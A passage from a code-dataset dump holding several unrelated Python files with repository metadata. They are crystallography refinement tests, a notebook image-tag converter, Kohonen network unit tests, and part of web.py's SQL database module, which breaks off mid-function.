site=(0.112835, 0.620998, 0.658260),
u=0.039775)
)))
self.t_celsius = -153
self.shall_refine_thermal_displacements = True
k=1.5 # that is the multiplier used to refine the structure with ShelXL
self.constraints = [
_.terminal_planar_xh2_sites(
pivot=3,
constrained_site_indices=(4, 5)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=3,
u_iso_scatterer_idx=4,
multiplier=k),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=3,
u_iso_scatterer_idx=5,
multiplier=k),
_.terminal_linear_ch_site(
pivot=15,
constrained_site_indices=(16,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=15,
u_iso_scatterer_idx=16,
multiplier=k),
_.terminal_linear_ch_site(
pivot=18,
constrained_site_indices=(19,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=18,
u_iso_scatterer_idx=19,
multiplier=k),
_.secondary_planar_xh_site(
pivot=12,
constrained_site_indices=(13,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=12,
u_iso_scatterer_idx=13,
multiplier=k),
_.secondary_planar_xh_site(
pivot=8,
constrained_site_indices=(9,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=8,
u_iso_scatterer_idx=9,
multiplier=k),
]
self.expected_reparametrisation_for_hydrogen_named = {
'H1N': (core.terminal_planar_xh2_sites, 'N2'),
'H2N': (core.terminal_planar_xh2_sites, 'N2'),
'H10': (core.terminal_linear_ch_site, 'C10'),
'H6' : (core.secondary_planar_xh_site, 'C6'),
'H3' : (core.secondary_planar_xh_site, 'C3'),
'H8': (core.terminal_linear_ch_site, 'C8'),
}
self.site_refinement_tolerance = 1e-2
self.u_star_refinement_tolerance = 1e-5
class symmetry_equivalent_test_case(test_case):
""" 09srv172 from Durham database """
def __init__(self, m):
test_case.__init__(self, m)
self.xray_structure = xray.structure(
crystal_symmetry=crystal.symmetry(
unit_cell=(17.0216, 8.4362, 10.2248, 90, 102.79, 90),
space_group_symbol='hall: -C 2yc'),
scatterers=flex.xray_scatterer((
xray.scatterer( #0
label='S1',
site=(0.525736, 0.737492, 0.619814),
u=(0.000084, 0.000243, 0.000191,
0.000021, 0.000026, -0.000035)),
xray.scatterer( #1
label='C1',
site=(0.500000, 0.868009, 0.750000),
u=(0.000061, 0.000181, 0.000164,
0.000000, 0.000025, 0.000000)),
xray.scatterer( #2
label='C2',
site=(0.533017, 0.552825, 0.710913),
u=(0.000161, 0.000241, 0.000348,
0.000041, 0.000039, -0.000020)),
xray.scatterer( #3
label='H2A',
site=(0.525986, 0.462184, 0.647894),
u=0.041420),
xray.scatterer( #4
label='H2B',
site=(0.586473, 0.543642, 0.772877),
u=0.038360),
xray.scatterer( #5
label='C3',
site=(0.425914, 0.971290, 0.682589),
u=(0.000058, 0.000199, 0.000164,
-0.000003, 0.000017, -0.000007)),
xray.scatterer( #6
label='H3',
site=(0.441258, 1.029902, 0.606966),
u=0.023950),
xray.scatterer( #7
label='C4',
site=(0.349971, 0.874741, 0.622481),
u=(0.000064, 0.000236, 0.000219,
-0.000015, 0.000011, -0.000014)),
xray.scatterer( #8
label='H4B',
site=(0.362228, 0.799281, 0.555566),
u=0.026970),
xray.scatterer( #9
label='H4A',
site=(0.333906, 0.812566, 0.694426),
u=0.025070),
xray.scatterer( #10
label='C5',
site=(0.279832, 0.981636, 0.555089),
u=(0.000064, 0.000307, 0.000222,
-0.000007, 0.000003, -0.000021)),
xray.scatterer( #11
label='H5B',
site=(0.294150, 1.037327, 0.478372),
u=0.026970),
xray.scatterer( #12
label='H5A',
site=(0.231706, 0.915594, 0.519984),
u=0.034720),
xray.scatterer( #13
label='C6',
site=(0.259978, 1.103478, 0.653453),
u=(0.000061, 0.000335, 0.000246,
0.000016, 0.000021, -0.000001)),
xray.scatterer( #14
label='H6B',
site=(0.216403, 1.174193, 0.606307),
u=0.037560),
xray.scatterer( #15
label='H6A',
site=(0.240791, 1.048477, 0.726038),
u=0.024860),
xray.scatterer( #16
label='C7',
site=(0.334517, 1.201490, 0.713404),
u=(0.000071, 0.000265, 0.000251,
0.000019, 0.000019, -0.000029)),
xray.scatterer( #17
label='H7B',
site=(0.349843, 1.265431, 0.641770),
u=0.031500),
xray.scatterer( #18
label='H7A',
site=(0.321733, 1.275376, 0.780996),
u=0.030620),
xray.scatterer( #19
label='C8',
site=(0.405687, 1.096392, 0.779637),
u=(0.000064, 0.000247, 0.000187,
0.000009, 0.000015, -0.000033)),
xray.scatterer( #20
label='H8A',
site=(0.392638, 1.042204, 0.858057),
u=0.026000),
xray.scatterer( #21
label='H8B',
site=(0.453574, 1.163891, 0.812432),
u=0.027360)
)))
self.t_celsius = -153
self.shall_refine_thermal_displacements = True
self.constraints = [
_.secondary_xh2_sites(
pivot=2,
constrained_site_indices=(3,4)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=2,
u_iso_scatterer_idx=3,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=2,
u_iso_scatterer_idx=4,
multiplier=1.5),
_.tertiary_xh_site(
pivot=5,
constrained_site_indices=(6,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=5,
u_iso_scatterer_idx=6,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=7,
constrained_site_indices=(8, 9)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=7,
u_iso_scatterer_idx=8,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=7,
u_iso_scatterer_idx=9,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=10,
constrained_site_indices=(11, 12)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=10,
u_iso_scatterer_idx=11,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=10,
u_iso_scatterer_idx=12,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=13,
constrained_site_indices=(14, 15)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=13,
u_iso_scatterer_idx=14,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=13,
u_iso_scatterer_idx=15,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=16,
constrained_site_indices=(17, 18)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=16,
u_iso_scatterer_idx=17,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=16,
u_iso_scatterer_idx=18,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=19,
constrained_site_indices=(20, 21)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=19,
u_iso_scatterer_idx=20,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=19,
u_iso_scatterer_idx=21,
multiplier=1.5),
]
self.expected_reparametrisation_for_hydrogen_named = {
"H2A": (core.secondary_xh2_sites, 'C2'),
"H2B": (core.secondary_xh2_sites, 'C2'),
"H3" : (core.tertiary_xh_site , 'C3'),
"H4A": (core.secondary_xh2_sites, 'C4'),
"H4B": (core.secondary_xh2_sites, 'C4'),
"H5A": (core.secondary_xh2_sites, 'C5'),
"H5B": (core.secondary_xh2_sites, 'C5'),
"H6A": (core.secondary_xh2_sites, 'C6'),
"H6B": (core.secondary_xh2_sites, 'C6'),
"H7A": (core.secondary_xh2_sites, 'C7'),
"H7B": (core.secondary_xh2_sites, 'C7'),
"H8A": (core.secondary_xh2_sites, 'C8'),
"H8B": (core.secondary_xh2_sites, 'C8'),
}
self.site_refinement_tolerance = 0.01
self.u_star_refinement_tolerance = 5e-7
def check_reparametrisation_construction_more(self):
for params in self.reparametrisation.asu_scatterer_parameters:
if params.site.scatterers[0].label == 'H2A':
h2a = params.site
(pivot, pivot_neighbour_0, pivot_neighbour_1,
bond_length, h_c_h_angle) = h2a.arguments()
expected = sorted([ (core.independent_site_parameter, 'S1'),
(core.symmetry_equivalent_site_parameter, 'C2',
'-x+1,y,-z+3/2') ], key=itemgetter(1))
actual = []
for n in (pivot_neighbour_0, pivot_neighbour_1):
if type(n) == core.independent_site_parameter:
actual.append((type(n), n.scatterers[0].label))
elif type(n) == core.symmetry_equivalent_site_parameter:
actual.append((type(n),
n.original.scatterers[0].label,
str(n.motion)))
actual.sort(key=itemgetter(1))
assert actual == expected
def run():
import libtbx.utils
libtbx.utils.show_times_at_exit()
import sys
from libtbx.option_parser import option_parser
command_line = (option_parser()
.option(None, "--normal_eqns_solving_method",
default='naive')
.option(None, "--fix_random_seeds",
action='store_true',
default='naive')
).process(args=sys.argv[1:])
opts = command_line.options
if opts.fix_random_seeds:
import random
random.seed(1)
flex.set_random_seed(1)
gradient_threshold=1e-8
step_threshold=1e-8
if opts.normal_eqns_solving_method == 'naive':
m = lambda eqns: normal_eqns_solving.naive_iterations(
eqns,
gradient_threshold=gradient_threshold,
step_threshold=step_threshold)
elif opts.normal_eqns_solving_method == 'levenberg-marquardt':
m = lambda eqns: normal_eqns_solving.levenberg_marquardt_iterations(
eqns,
gradient_threshold=gradient_threshold,
step_threshold=gradient_threshold,
tau=1e-7)
else:
raise RuntimeError("Unknown method %s" % opts.normal_eqns_solving_method)
for t in [
saturated_test_case(m),
sucrose_test_case(m),
symmetry_equivalent_test_case(m),
]:
t.run()
if __name__ == '__main__':
run()
| [
"jorge7soccer@gmail.com"
] | jorge7soccer@gmail.com |
a5e9844ef7a8111c56eb3a1649bb77022f0d4a5c | 49c3abd2b3fbb3bc5d1df47b1fddd09694ee4835 | /scripts/translate_figs.py | 6d2ad35b0719ad7472ee6b8091d0baa8be07d3e2 | [] | no_license | phaustin/e213_2019 | 0b9970745e1bee29b58fa97bd425b66e01c20db8 | ff66cc94cba57f53955cbbb4a72885146cabd5e4 | refs/heads/master | 2021-05-18T18:48:38.507719 | 2019-04-18T18:48:12 | 2019-04-18T18:48:12 | 251,362,114 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,387 | py | """
Usage: python translate_figs.py notebook.py
Given a jupytext python:percent notebook,
change all occurances of an image tag like:
<img src="figures/2d_flux.png" alt="pic05" width="20%" >
to a python Image call like this:
# Image(figures/2d_flux.png){width="20%"}
and write it out as a new file called notebook_nbsphinx.py
along with a translated notebook notebook_nbsphinx.ipynb
"""
import argparse
import json
import pdb
import re
import sys
from pathlib import Path
import jupytext
import nbformat
from bs4 import BeautifulSoup
from jupytext.formats import JUPYTEXT_FORMATS
from jupytext.formats import rearrange_jupytext_metadata
from jupytext.jupytext import writes
from nbconvert.preprocessors import CellExecutionError
from nbconvert.preprocessors import ExecutePreprocessor
from nbformat.v4.nbbase import new_code_cell
from nbformat.v4.nbbase import new_markdown_cell
from nbformat.v4.nbbase import new_notebook
split_cell_re = re.compile(r"(.*)(#\s+.*\<img\s+src.*\>)(.*)", re.DOTALL)
image_re = re.compile(r"#\s+.*(\<img.*\>).*")
image_re = re.compile(r".*(\<img\s+src.*\>).*")
template = '# {{width="{width:}"}}\n'
py_template = 'Image("{src:}",width="{width:}")\n'
toc_meta = {
"toc": {
"base_numbering": 1,
"nav_menu": {},
"number_sections": True,
"sideBar": True,
"skip_h1_title": True,
"title_cell": "Table of Contents",
"title_sidebar": "Contents",
"toc_cell": True,
"toc_position": {},
"toc_section_display": True,
"toc_window_display": True,
}
}
fmt_dict = {item.format_name: item for item in JUPYTEXT_FORMATS}
def make_parser():
"""
set up the command line arguments needed to call the program
"""
linebreaks = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(
formatter_class=linebreaks, description=__doc__.lstrip()
)
parser.add_argument("infile", type=str, help="name of pytnon notebook")
return parser
def main(args=None):
parser = make_parser()
args = parser.parse_args(args)
infile = Path(args.infile).resolve()
in_dir = infile.parent
py_outfile = in_dir / f"{infile.stem}_nbsphinx.py"
nb_outfile = in_dir.parent / f"{infile.stem}_nbsphinx.ipynb"
print(f"writing:\n{py_outfile}\n{nb_outfile}")
with open(infile, "r") as input_file:
in_py = input_file.readlines()
# collect = ""
# for the_line in in_py:
# match = image_re.match(the_line)
# if match:
# text = match.group(1)
# soup = BeautifulSoup(text, "html.parser")
# out = soup()
# md_image = template.format_map(out[0].attrs)
# collect += md_image
# else:
# collect += the_line
# with open(py_outfile, "w") as output_file:
# output_file.write(collect)
# with open(nb_outfile, "w") as output_file:
# nb = jupytext.readf(py_outfile)
# jupytext.writef(nb, nb_outfile, fmt="ipynb")
orig_nb = jupytext.readf(infile)
split_cell_re = re.compile(
r"^(?P<front>.*?)(?P<img>\<img\s+src.*\>)(?P<back>.*?)", re.DOTALL
)
need_display_import = True
new_nb_cells = list(orig_nb.cells)
for index, item in enumerate(orig_nb.cells):
print(f"at cell {index}")
item["metadata"]["cell_count"] = index
if item["cell_type"] == "markdown":
text = item["source"]
if text.find("pic") > -1:
print(f"found img for: {text[:20]}")
out = split_cell_re.match(text)
if out:
print(f"length of split is {len(out.groups())}")
print(f"splitting cell at index {index}")
cell_dict = dict()
for name in ["front", "back"]:
src = out.group(name)
if len(src) > 0:
cell_dict[name] = new_markdown_cell(source=src)
src = out.group("img")
match = image_re.match(src)
if match:
text = match.group(1)
soup = BeautifulSoup(text, "html.parser")
out = soup()
py_image = py_template.format_map(out[0].attrs)
cell_dict["img"] = new_code_cell(source=py_image)
count = 0
for key in ["front", "img", "back"]:
try:
if key == "front":
new_nb_cells[index] = cell_dict[key]
else:
new_nb_cells.insert(index + count, cell_dict[key])
count += 1
except KeyError:
pass
else:
item["metadata"]["cell_count"] = index
if item["source"].find("IPython.display") > -1:
need_display_import = False
print(f"found python cell: {item['source']}")
if need_display_import:
top_cell = new_code_cell(source="from IPython.display import Image")
new_nb_cells.insert(1, top_cell)
orig_nb.cells = new_nb_cells
# https://nbconvert.readthedocs.io/en/latest/execute_api.html
print(f"running notebook in folder {nb_outfile.parent}")
ep = ExecutePreprocessor(timeout=600, kernel_name="python3", allow_errors=True)
path = str(nb_outfile.parent)
path_dict = dict({"metadata": {"path": path}})
try:
out = ep.preprocess(orig_nb, path_dict)
except CellExecutionError:
out = None
msg = f"Error executing the notebook {nb_outfile.name}.\n\n"
msg += f"See notebook {nb_outfile.name} for the traceback."
print(msg)
raise
finally:
if "toc" not in orig_nb["metadata"]:
orig_nb["metadata"].update(toc_meta)
pdb.set_trace()
rearrange_jupytext_metadata(orig_nb["metadata"])
out = writes(orig_nb, "py", nbformat.NO_CONVERT)
pdb.set_trace()
with open(nb_outfile, mode="wt") as f:
nbformat.write(orig_nb, f)
jupytext.writef(orig_nb, py_outfile, fmt="py")
print(f"wrote {nb_outfile} and \n {py_outfile}")
if __name__ == "__main__":
#
# will exit with non-zero return value if exceptions occur
#
# args = ['vancouver_hires.h5']
sys.exit(main())
| [
"paustin@eos.ubc.ca"
] | paustin@eos.ubc.ca |
2ebe41aa7b83bf751f563796d36307ca3e0d94da | 8e6546515c8094f2df7fca4be343b57a1716257a | /tests/algorithms/associative/test_kohonen.py | d8a23d2f1bcfb9f72d8e7f49994c478d12883f70 | [
"MIT"
] | permissive | FGDBTKD/neupy | b51e5870ef75df8aa3dcfb6753648a235f39e50b | 1f5e1ae9364e8c7816df79678a4648c689d2a5d1 | refs/heads/master | 2020-03-31T13:32:57.099935 | 2018-10-29T15:52:19 | 2018-10-29T15:52:19 | 152,260,277 | 0 | 0 | MIT | 2018-10-29T15:52:20 | 2018-10-09T13:56:16 | Python | UTF-8 | Python | false | false | 1,731 | py | import numpy as np
from neupy import algorithms
from base import BaseTestCase
input_data = np.array([
[0.1961, 0.9806],
[-0.1961, 0.9806],
[0.9806, 0.1961],
[0.9806, -0.1961],
[-0.5812, -0.8137],
[-0.8137, -0.5812],
])
class KohonenTestCase(BaseTestCase):
def test_kohonen_success(self):
kh = algorithms.Kohonen(
n_inputs=2,
n_outputs=3,
weight=np.array([
[0.7071, 0.7071, -1.0000],
[-0.7071, 0.7071, 0.0000],
]),
step=0.5,
verbose=False,
)
# test one iteration update
data = np.reshape(input_data[0, :], (1, input_data.shape[1]))
kh.train(data, epochs=1)
np.testing.assert_array_almost_equal(
kh.weight,
np.array([
[0.7071, 0.4516, -1.0000],
[-0.7071, 0.84385, 0.0000],
]),
decimal=4
)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
algorithms.Kohonen(
n_inputs=1,
n_outputs=2,
step=0.5,
verbose=False
),
np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
knet = algorithms.Kohonen(
n_inputs=1,
n_outputs=2,
step=0.5,
verbose=False,
)
data = np.array([[1, 1, 1]]).T
target = np.array([
[1, 0],
[1, 0],
[1, 0],
])
knet.train(data, epochs=100)
self.assertInvalidVectorPred(knet, data.ravel(), target,
decimal=2)
| [
"mail@itdxer.com"
] | mail@itdxer.com |
cd680ed3da608dd25b4d2a60a4c8907d52b8dba8 | 3fdaa54102e0be999e3fc664a917ea0a7a603675 | /cloudprint/Lib/site-packages/web.py-0.40.dev0-py3.5.egg/web/db.py | a8eb75f5b2dc6d4ec7403c2f4c04c59e95ae1321 | [
"MIT"
] | permissive | William-An/CloudPrint | ba8033175a11e25a2c68ccf7b8a3387e78ac1719 | 952f25341ea0423b83ee2ded1927ba0cf160a095 | refs/heads/master | 2022-11-04T13:58:27.715234 | 2017-04-17T05:33:25 | 2017-04-17T05:33:25 | 88,139,548 | 9 | 3 | MIT | 2022-10-20T01:19:11 | 2017-04-13T07:53:55 | Python | UTF-8 | Python | false | false | 43,930 | py | """
Database API
(part of web.py)
"""
from __future__ import print_function
from .utils import threadeddict, storage, iters, iterbetter, safestr, safeunicode
import datetime, time, os, urllib, re
from .py3helpers import PY2, string_types, numeric_types, iteritems
try:
from urllib import parse as urlparse
from urllib.parse import unquote
except ImportError:
import urlparse
from urllib import unquote
try:
# db module can work independent of web.py
from .webapi import debug, config
except:
import sys
debug = sys.stderr
config = storage()
__all__ = [
"UnknownParamstyle", "UnknownDB", "TransactionError",
"sqllist", "sqlors", "reparam", "sqlquote",
"SQLQuery", "SQLParam", "sqlparam",
"SQLLiteral", "sqlliteral",
"database", 'DB',
]
TOKEN = '[ \\f\\t]*(\\\\\\r?\\n[ \\f\\t]*)*(#[^\\r\\n]*)?(((\\d+[jJ]|((\\d+\\.\\d*|\\.\\d+)([eE][-+]?\\d+)?|\\d+[eE][-+]?\\d+)[jJ])|((\\d+\\.\\d*|\\.\\d+)([eE][-+]?\\d+)?|\\d+[eE][-+]?\\d+)|(0[xX][\\da-fA-F]+[lL]?|0[bB][01]+[lL]?|(0[oO][0-7]+)|(0[0-7]*)[lL]?|[1-9]\\d*[lL]?))|((\\*\\*=?|>>=?|<<=?|<>|!=|//=?|[+\\-*/%&|^=<>]=?|~)|[][(){}]|(\\r?\\n|[:;.,`@]))|([uUbB]?[rR]?\'[^\\n\'\\\\]*(?:\\\\.[^\\n\'\\\\]*)*\'|[uUbB]?[rR]?"[^\\n"\\\\]*(?:\\\\.[^\\n"\\\\]*)*")|[a-zA-Z_]\\w*)'
tokenprog = re.compile(TOKEN)
class UnknownDB(Exception):
"""raised for unsupported dbms"""
pass
class _ItplError(ValueError):
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
class TransactionError(Exception): pass
class UnknownParamstyle(Exception):
"""
raised for unsupported db paramstyles
(currently supported: qmark, numeric, format, pyformat)
"""
pass
class SQLParam(object):
"""
Parameter in SQLQuery.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam("joe")])
>>> q
<sql: "SELECT * FROM test WHERE name='joe'">
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.values()
['joe']
"""
__slots__ = ["value"]
def __init__(self, value):
self.value = value
def get_marker(self, paramstyle='pyformat'):
if paramstyle == 'qmark':
return '?'
elif paramstyle == 'numeric':
return ':1'
elif paramstyle is None or paramstyle in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(paramstyle)
def sqlquery(self):
return SQLQuery([self])
def __add__(self, other):
return self.sqlquery() + other
def __radd__(self, other):
return other + self.sqlquery()
def __str__(self):
return str(self.value)
def __repr__(self):
return '<param: %s>' % repr(self.value)
sqlparam = SQLParam
class SQLQuery(object):
"""
You can pass this sort of thing as a clause in any db function.
Otherwise, you can pass a dictionary to the keyword argument `vars`
and the function will call reparam for you.
Internally, consists of `items`, which is a list of strings and
SQLParams, which get concatenated to produce the actual query.
"""
__slots__ = ["items"]
# tested in sqlquote's docstring
def __init__(self, items=None):
r"""Creates a new SQLQuery.
>>> SQLQuery("x")
<sql: 'x'>
>>> q = SQLQuery(['SELECT * FROM ', 'test', ' WHERE x=', SQLParam(1)])
>>> q
<sql: 'SELECT * FROM test WHERE x=1'>
>>> q.query(), q.values()
('SELECT * FROM test WHERE x=%s', [1])
>>> SQLQuery(SQLParam(1))
<sql: '1'>
"""
if items is None:
self.items = []
elif isinstance(items, list):
self.items = items
elif isinstance(items, SQLParam):
self.items = [items]
elif isinstance(items, SQLQuery):
self.items = list(items.items)
else:
self.items = [items]
# Take care of SQLLiterals
for i, item in enumerate(self.items):
if isinstance(item, SQLParam) and isinstance(item.value, SQLLiteral):
self.items[i] = item.value.v
def append(self, value):
self.items.append(value)
def __add__(self, other):
if isinstance(other, string_types):
items = [other]
elif isinstance(other, SQLQuery):
items = other.items
else:
return NotImplemented
return SQLQuery(self.items + items)
def __radd__(self, other):
if isinstance(other, string_types):
items = [other]
else:
return NotImplemented
return SQLQuery(items + self.items)
def __iadd__(self, other):
if isinstance(other, (string_types, SQLParam)):
self.items.append(other)
elif isinstance(other, SQLQuery):
self.items.extend(other.items)
else:
return NotImplemented
return self
def __len__(self):
return len(self.query())
def query(self, paramstyle=None):
"""
Returns the query part of the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.query(paramstyle='qmark')
'SELECT * FROM test WHERE name=?'
"""
s = []
for x in self.items:
if isinstance(x, SQLParam):
x = x.get_marker(paramstyle)
s.append(safestr(x))
else:
x = safestr(x)
# automatically escape % characters in the query
# For backward compatability, ignore escaping when the query looks already escaped
if paramstyle in ['format', 'pyformat']:
if '%' in x and '%%' not in x:
x = x.replace('%', '%%')
s.append(x)
return "".join(s)
def values(self):
"""
Returns the values of the parameters used in the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.values()
['joe']
"""
return [i.value for i in self.items if isinstance(i, SQLParam)]
def join(items, sep=' ', prefix=None, suffix=None, target=None):
"""
Joins multiple queries.
>>> SQLQuery.join(['a', 'b'], ', ')
<sql: 'a, b'>
Optinally, prefix and suffix arguments can be provided.
>>> SQLQuery.join(['a', 'b'], ', ', prefix='(', suffix=')')
<sql: '(a, b)'>
If target argument is provided, the items are appended to target instead of creating a new SQLQuery.
"""
if target is None:
target = SQLQuery()
target_items = target.items
if prefix:
target_items.append(prefix)
for i, item in enumerate(items):
if i != 0:
target_items.append(sep)
if isinstance(item, SQLQuery):
target_items.extend(item.items)
else:
target_items.append(item)
if suffix:
target_items.append(suffix)
return target
join = staticmethod(join)
def _str(self):
try:
return self.query() % tuple([sqlify(x) for x in self.values()])
except (ValueError, TypeError):
return self.query()
def __str__(self):
return safestr(self._str())
def __unicode__(self):
return safeunicode(self._str())
def __repr__(self):
return '<sql: %s>' % repr(str(self))
class SQLLiteral:
"""
Protects a string from `sqlquote`.
>>> sqlquote('NOW()')
<sql: "'NOW()'">
>>> sqlquote(SQLLiteral('NOW()'))
<sql: 'NOW()'>
"""
def __init__(self, v):
self.v = v
def __repr__(self):
return self.v
sqlliteral = SQLLiteral
def _sqllist(values):
"""
>>> _sqllist([1, 2, 3])
<sql: '(1, 2, 3)'>
"""
items = []
items.append('(')
for i, v in enumerate(values):
if i != 0:
items.append(', ')
items.append(sqlparam(v))
items.append(')')
return SQLQuery(items)
def reparam(string_, dictionary):
"""
Takes a string and a dictionary and interpolates the string
using values from the dictionary. Returns an `SQLQuery` for the result.
>>> reparam("s = $s", dict(s=True))
<sql: "s = 't'">
>>> reparam("s IN $s", dict(s=[1, 2]))
<sql: 's IN (1, 2)'>
"""
dictionary = dictionary.copy() # eval mucks with it
# disable builtins to avoid risk for remote code exection.
dictionary['__builtins__'] = object()
vals = []
result = []
for live, chunk in _interpolate(string_):
if live:
v = eval(chunk, dictionary)
result.append(sqlquote(v))
else:
result.append(chunk)
return SQLQuery.join(result, '')
def sqlify(obj):
"""
converts `obj` to its proper SQL version
>>> sqlify(None)
'NULL'
>>> sqlify(True)
"'t'"
>>> sqlify(3)
'3'
"""
# because `1 == True and hash(1) == hash(True)`
# we have to do this the hard way...
if obj is None:
return 'NULL'
elif obj is True:
return "'t'"
elif obj is False:
return "'f'"
elif isinstance(obj, numeric_types):
return str(obj)
elif isinstance(obj, datetime.datetime):
return repr(obj.isoformat())
else:
if PY2 and isinstance(obj, unicode): #Strings are always UTF8 in Py3
obj = obj.encode('utf8')
return repr(obj)
def sqllist(lst):
"""
Converts the arguments for use in something like a WHERE clause.
>>> sqllist(['a', 'b'])
'a, b'
>>> sqllist('a')
'a'
"""
if isinstance(lst, string_types):
return lst
else:
return ', '.join(lst)
def sqlors(left, lst):
"""
`left is a SQL clause like `tablename.arg = `
and `lst` is a list of values. Returns a reparam-style
pair featuring the SQL that ORs together the clause
for each item in the lst.
>>> sqlors('foo = ', [])
<sql: '1=2'>
>>> sqlors('foo = ', [1])
<sql: 'foo = 1'>
>>> sqlors('foo = ', 1)
<sql: 'foo = 1'>
>>> sqlors('foo = ', [1,2,3])
<sql: '(foo = 1 OR foo = 2 OR foo = 3 OR 1=2)'>
"""
if isinstance(lst, iters):
lst = list(lst)
ln = len(lst)
if ln == 0:
return SQLQuery("1=2")
if ln == 1:
lst = lst[0]
if isinstance(lst, iters):
return SQLQuery(['('] +
sum([[left, sqlparam(x), ' OR '] for x in lst], []) +
['1=2)']
)
else:
return left + sqlparam(lst)
def sqlwhere(data, grouping=' AND '):
"""
Converts a two-tuple (key, value) iterable `data` to an SQL WHERE clause `SQLQuery`.
>>> sqlwhere((('cust_id', 2), ('order_id',3)))
<sql: 'cust_id = 2 AND order_id = 3'>
>>> sqlwhere((('order_id', 3), ('cust_id', 2)), grouping=', ')
<sql: 'order_id = 3, cust_id = 2'>
>>> sqlwhere((('a', 'a'), ('b', 'b'))).query()
'a = %s AND b = %s'
"""
return SQLQuery.join([k + ' = ' + sqlparam(v) for k, v in data], grouping)
def sqlquote(a):
"""
Ensures `a` is quoted properly for use in a SQL query.
>>> 'WHERE x = ' + sqlquote(True) + ' AND y = ' + sqlquote(3)
<sql: "WHERE x = 't' AND y = 3">
>>> 'WHERE x = ' + sqlquote(True) + ' AND y IN ' + sqlquote([2, 3])
<sql: "WHERE x = 't' AND y IN (2, 3)">
"""
if isinstance(a, list):
return _sqllist(a)
else:
return sqlparam(a).sqlquery()
class Transaction:
"""Database transaction."""
def __init__(self, ctx):
self.ctx = ctx
self.transaction_count = transaction_count = len(ctx.transactions)
class transaction_engine:
"""Transaction Engine used in top level transactions."""
def do_transact(self):
ctx.commit(unload=False)
def do_commit(self):
ctx.commit()
def do_rollback(self):
ctx.rollback()
class subtransaction_engine:
"""Transaction Engine used in sub transactions."""
def query(self, q):
db_cursor = ctx.db.cursor()
ctx.db_execute(db_cursor, SQLQuery(q % transaction_count))
def do_transact(self):
self.query('SAVEPOINT webpy_sp_%s')
def do_commit(self):
self.query('RELEASE SAVEPOINT webpy_sp_%s')
def do_rollback(self):
self.query('ROLLBACK TO SAVEPOINT webpy_sp_%s')
class dummy_engine:
"""Transaction Engine used instead of subtransaction_engine
when sub transactions are not supported."""
do_transact = do_commit = do_rollback = lambda self: None
if self.transaction_count:
# nested transactions are not supported in some databases
if self.ctx.get('ignore_nested_transactions'):
self.engine = dummy_engine()
else:
self.engine = subtransaction_engine()
else:
self.engine = transaction_engine()
self.engine.do_transact()
self.ctx.transactions.append(self)
def __enter__(self):
return self
def __exit__(self, exctype, excvalue, traceback):
if exctype is not None:
self.rollback()
else:
self.commit()
def commit(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_commit()
self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
def rollback(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_rollback()
self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
class DB:
"""Database"""
def __init__(self, db_module, keywords):
"""Creates a database.
"""
# some DB implementaions take optional paramater `driver` to use a specific driver modue
# but it should not be passed to connect
keywords.pop('driver', None)
self.db_module = db_module
self.keywords = keywords
self._ctx = threadeddict()
# flag to enable/disable printing queries
self.printing = config.get('debug_sql', config.get('debug', False))
self.supports_multiple_insert = False
try:
import DBUtils
# enable pooling if DBUtils module is available.
self.has_pooling = True
except ImportError:
self.has_pooling = False
# Pooling can be disabled by passing pooling=False in the keywords.
self.has_pooling = self.keywords.pop('pooling', True) and self.has_pooling
def _getctx(self):
if not self._ctx.get('db'):
self._load_context(self._ctx)
return self._ctx
ctx = property(_getctx)
def _load_context(self, ctx):
ctx.dbq_count = 0
ctx.transactions = [] # stack of transactions
if self.has_pooling:
ctx.db = self._connect_with_pooling(self.keywords)
else:
ctx.db = self._connect(self.keywords)
ctx.db_execute = self._db_execute
if not hasattr(ctx.db, 'commit'):
ctx.db.commit = lambda: None
if not hasattr(ctx.db, 'rollback'):
ctx.db.rollback = lambda: None
def commit(unload=True):
# do db commit and release the connection if pooling is enabled.
ctx.db.commit()
if unload and self.has_pooling:
